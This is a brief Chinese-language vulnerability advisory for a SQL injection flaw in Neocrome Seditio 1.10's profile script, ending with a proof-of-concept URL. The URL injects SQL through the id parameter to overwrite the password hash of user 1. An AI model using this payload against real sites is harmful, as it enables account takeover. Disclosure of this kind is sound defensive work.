Seditio是一款基于PHP的WEB应用程序。
Seditio不正确过滤用户提交的URI数据,远程攻击者可以利用漏洞进行sql注入攻击,获得敏感信息。
问题是由于’Users.Profile.Inc.PHP’脚本对用户提交的WEB参数缺少过滤,提交恶意sql查询作为参数数据,可更改原来的sql逻辑,获得敏感信息。
Neocrome Seditio 1.10
目前没有解决方案提供:
<a href=“http://www.neocrome.net/page.php?al=seditio” target=“_blank”>http://www.neocrome.net/page.php?al=seditio</a>
http://www.example.com/users.php?m=profile&a=avatarselect&x=011A99&id=default.gif%2500%2527,user_password=%2527e10adc3949ba59abbe56e057f20f883e%2527/**/wher
e/**/user_id=1/*